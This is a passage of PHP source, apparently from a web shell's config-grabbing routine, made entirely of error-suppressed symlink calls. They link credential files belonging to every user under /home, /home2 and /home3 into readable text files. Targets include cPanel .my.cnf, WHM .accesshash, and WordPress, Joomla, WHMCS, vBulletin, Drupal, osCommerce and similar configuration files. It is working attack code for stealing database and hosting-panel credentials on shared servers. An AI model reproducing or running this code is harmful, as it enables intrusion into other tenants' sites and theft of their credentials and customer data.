3362. @symlink('/home/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
3363. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
3364. @symlink('/home/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
3365. @symlink('/home/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
3366. @symlink('/home/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
3367. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
3368. @symlink('/home/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
3369. @symlink('/home/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
3370. @symlink('/home/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
3371. @symlink('/home/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
3372. @symlink('/home/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
3373. @symlink('/home/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
3374. @symlink('/home/' . $user . '/public_html/home/wp-config.php', $user . '-wp-home.txt');
3375. @symlink('/home/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
3376. @symlink('/home/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
3377. @symlink('/home/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
3378. @symlink('/home/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
3379. @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3380. @symlink('/home/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3381. @symlink('/home/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
3382. @symlink('/home/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
3383. @symlink('/home/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
3384. @symlink('/home/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
3385. @symlink('/home/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
3386. @symlink('/home/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
3387. @symlink('/home/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
3388. @symlink('/home/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
3389. @symlink('/home/' . $user . '/public_html/home/configuration.php', $user . '-joomla-home.txt');
3390. @symlink('/home/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
3391. @symlink('/home/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
3392. @symlink('/home/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
3393. @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
3394. @symlink('/home/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
3395. @symlink('/home/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
3396. @symlink('/home/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
3397. @symlink('/home/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
3398. @symlink('/home/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
3399. @symlink('/home/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
3400. @symlink('/home/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
3401. @symlink('/home/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
3402. @symlink('/home/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
3403. @symlink('/home/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
3404. @symlink('/home/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
3405. @symlink('/home/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
3406. @symlink('/home/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
3407. @symlink('/home/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
3408. @symlink('/home/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
3409. @symlink('/home/' . $user . '/public_html/include/db.php', $user . '-7.txt');
3410. @symlink('/home/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
3411. @symlink('/home/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
3412. @symlink('/home/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
3413. @symlink('/home/' . $user . '/public_html/config.php', $user . '-4images.txt');
3414. @symlink('/home/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
3415. @symlink('/home/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
3416. @symlink('/home/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
3417. @symlink('/home/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
3418. @symlink('/home/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
3419. @symlink('/home/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
3420. @symlink('/home/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
3421. @symlink('/home/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
3422. @symlink('/home/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
3423. @symlink('/home/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
3424. @symlink('/home/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
3425. @symlink('/home/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
3426. @symlink('/home/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
3427. @symlink('/home/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
3428. @symlink('/home/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
3429. @symlink('/home/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
3430. @symlink('/home/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
3431. @symlink('/home/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
3432. @symlink('/home/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
3433. @symlink('/home/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
3434. @symlink('/home/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
3435. @symlink('/home/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
3436. @symlink('/home/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
3437. @symlink('/home/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
3438. @symlink('/home/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
3439. @symlink('/home/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
3440. @symlink('/home/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
3441. @symlink('/home/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
3442. @symlink('/home/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
3443. @symlink('/home/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
3444. @symlink('/home/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
3445. @symlink('/home/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
3446. @symlink('/home/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
3447. @symlink('/home/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
3448. @symlink('/home/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
3449. @symlink('/home/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
3450. @symlink('/home/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
3451. @symlink('/home/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
3452. @symlink('/home/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
3453. @symlink('/home/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
3454. @symlink('/home/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
3455. @symlink('/home/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
3456. @symlink('/home/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
3457. @symlink('/home/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
3458. @symlink('/home/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
3459. @symlink('/home/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
3460. @symlink('/home/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
3461. @symlink('/home/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
3462. @symlink('/home/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
3463. @symlink('/home/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
3464. @symlink('/home/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
3465. @symlink('/home/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
3466. @symlink('/home/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
3467. @symlink('/home/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
3468. @symlink('/home2/' . $user . '/.my.cnf', $user . '-cpanel.txt');
3469. @symlink('/home2/' . $user . '/.accesshash', $user . '-WHM-accesshash.txt');
3470. @symlink('/home2/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
3471. @symlink('/home2/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
3472. @symlink('/home2/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
3473. @symlink('/home2/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
3474. @symlink('/home2/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
3475. @symlink('/home2/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
3476. @symlink('/home2/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
3477. @symlink('/home2/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
3478. @symlink('/home2/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
3479. @symlink('/home2/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
3480. @symlink('/home2/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
3481. @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images1.txt');
3482. @symlink('/home2/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
3483. @symlink('/home2/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
3484. @symlink('/home2/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
3485. @symlink('/home2/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
3486. @symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
3487. @symlink('/home2/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
3488. @symlink('/home2/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
3489. @symlink('/home2/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
3490. @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
3491. @symlink('/home2/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
3492. @symlink('/home2/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
3493. @symlink('/home2/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
3494. @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
3495. @symlink('/home2/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
3496. @symlink('/home2/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
3497. @symlink('/home2/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
3498. @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
3499. @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
3500. @symlink('/home2/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
3501. @symlink('/home2/' . $user . '/public_html/home2/wp-config.php', $user . '-wp-home2.txt');
3502. @symlink('/home2/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
3503. @symlink('/home2/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
3504. @symlink('/home2/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
3505. @symlink('/home2/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
3506. @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3507. @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3508. @symlink('/home2/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
3509. @symlink('/home2/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
3510. @symlink('/home2/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
3511. @symlink('/home2/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
3512. @symlink('/home2/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
3513. @symlink('/home2/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
3514. @symlink('/home2/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
3515. @symlink('/home2/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
3516. @symlink('/home2/' . $user . '/public_html/home2/configuration.php', $user . '-joomla-home2.txt');
3517. @symlink('/home2/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
3518. @symlink('/home2/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
3519. @symlink('/home2/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
3520. @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
3521. @symlink('/home2/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
3522. @symlink('/home2/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
3523. @symlink('/home2/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
3524. @symlink('/home2/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
3525. @symlink('/home2/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
3526. @symlink('/home2/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
3527. @symlink('/home2/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
3528. @symlink('/home2/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
3529. @symlink('/home2/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
3530. @symlink('/home2/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
3531. @symlink('/home2/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
3532. @symlink('/home2/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
3533. @symlink('/home2/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
3534. @symlink('/home2/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
3535. @symlink('/home2/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
3536. @symlink('/home2/' . $user . '/public_html/include/db.php', $user . '-7.txt');
3537. @symlink('/home2/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
3538. @symlink('/home2/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
3539. @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
3540. @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images.txt');
3541. @symlink('/home2/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
3542. @symlink('/home2/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
3543. @symlink('/home2/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
3544. @symlink('/home2/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
3545. @symlink('/home2/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
3546. @symlink('/home2/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
3547. @symlink('/home2/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
3548. @symlink('/home2/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
3549. @symlink('/home2/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
3550. @symlink('/home2/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
3551. @symlink('/home2/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
3552. @symlink('/home2/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
3553. @symlink('/home2/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
3554. @symlink('/home2/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
3555. @symlink('/home2/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
3556. @symlink('/home2/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
3557. @symlink('/home2/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
3558. @symlink('/home2/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
3559. @symlink('/home2/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
3560. @symlink('/home2/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
3561. @symlink('/home2/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
3562. @symlink('/home2/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
3563. @symlink('/home2/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
3564. @symlink('/home2/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
3565. @symlink('/home2/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
3566. @symlink('/home2/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
3567. @symlink('/home2/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
3568. @symlink('/home2/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
3569. @symlink('/home2/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
3570. @symlink('/home2/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
3571. @symlink('/home2/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
3572. @symlink('/home2/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
3573. @symlink('/home2/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
3574. @symlink('/home2/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
3575. @symlink('/home2/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
3576. @symlink('/home2/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
3577. @symlink('/home2/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
3578. @symlink('/home2/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
3579. @symlink('/home2/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
3580. @symlink('/home2/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
3581. @symlink('/home2/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
3582. @symlink('/home2/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
3583. @symlink('/home2/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
3584. @symlink('/home2/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
3585. @symlink('/home2/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
3586. @symlink('/home2/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
3587. @symlink('/home2/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
3588. @symlink('/home2/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
3589. @symlink('/home2/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
3590. @symlink('/home2/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
3591. @symlink('/home2/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
3592. @symlink('/home2/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
3593. @symlink('/home2/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
3594. @symlink('/home2/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
3595. @symlink('/home3/' . $user . '/.my.cnf', $user . '-cpanel.txt');
3596. @symlink('/home3/' . $user . '/.accesshash', $user . '-WHM-accesshash.txt');
3597. @symlink('/home3/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
3598. @symlink('/home3/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
3599. @symlink('/home3/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
3600. @symlink('/home3/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
3601. @symlink('/home3/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
3602. @symlink('/home3/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
3603. @symlink('/home3/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
3604. @symlink('/home3/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
3605. @symlink('/home3/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
3606. @symlink('/home3/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
3607. @symlink('/home3/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
3608. @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images1.txt');
3609. @symlink('/home3/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
3610. @symlink('/home3/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
3611. @symlink('/home3/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
3612. @symlink('/home3/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
3613. @symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
3614. @symlink('/home3/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
3615. @symlink('/home3/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
3616. @symlink('/home3/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
3617. @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
3618. @symlink('/home3/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
3619. @symlink('/home3/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
3620. @symlink('/home3/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
3621. @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
3622. @symlink('/home3/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
3623. @symlink('/home3/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
3624. @symlink('/home3/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
3625. @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
3626. @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
3627. @symlink('/home3/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
3628. @symlink('/home3/' . $user . '/public_html/home3/wp-config.php', $user . '-wp-home3.txt');
3629. @symlink('/home3/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
3630. @symlink('/home3/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
3631. @symlink('/home3/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
3632. @symlink('/home3/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
3633. @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3634. @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
3635. @symlink('/home3/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
3636. @symlink('/home3/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
3637. @symlink('/home3/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
3638. @symlink('/home3/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
3639. @symlink('/home3/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
3640. @symlink('/home3/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
3641. @symlink('/home3/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
3642. @symlink('/home3/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
3643. @symlink('/home3/' . $user . '/public_html/home3/configuration.php', $user . '-joomla-home3.txt');
3644. @symlink('/home3/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
3645. @symlink('/home3/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
3646. @symlink('/home3/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
3647. @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
3648. @symlink('/home3/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
3649. @symlink('/home3/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
3650. @symlink('/home3/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
3651. @symlink('/home3/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
3652. @symlink('/home3/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
3653. @symlink('/home3/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
3654. @symlink('/home3/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
3655. @symlink('/home3/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
3656. @symlink('/home3/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
3657. @symlink('/home3/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
3658. @symlink('/home3/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
3659. @symlink('/home3/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
3660. @symlink('/home3/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
3661. @symlink('/home3/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
3662. @symlink('/home3/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
3663. @symlink('/home3/' . $user . '/public_html/include/db.php', $user . '-7.txt');
3664. @symlink('/home3/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
3665. @symlink('/home3/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
3666. @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
3667. @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images.txt');
3668. @symlink('/home3/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
3669. @symlink('/home3/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
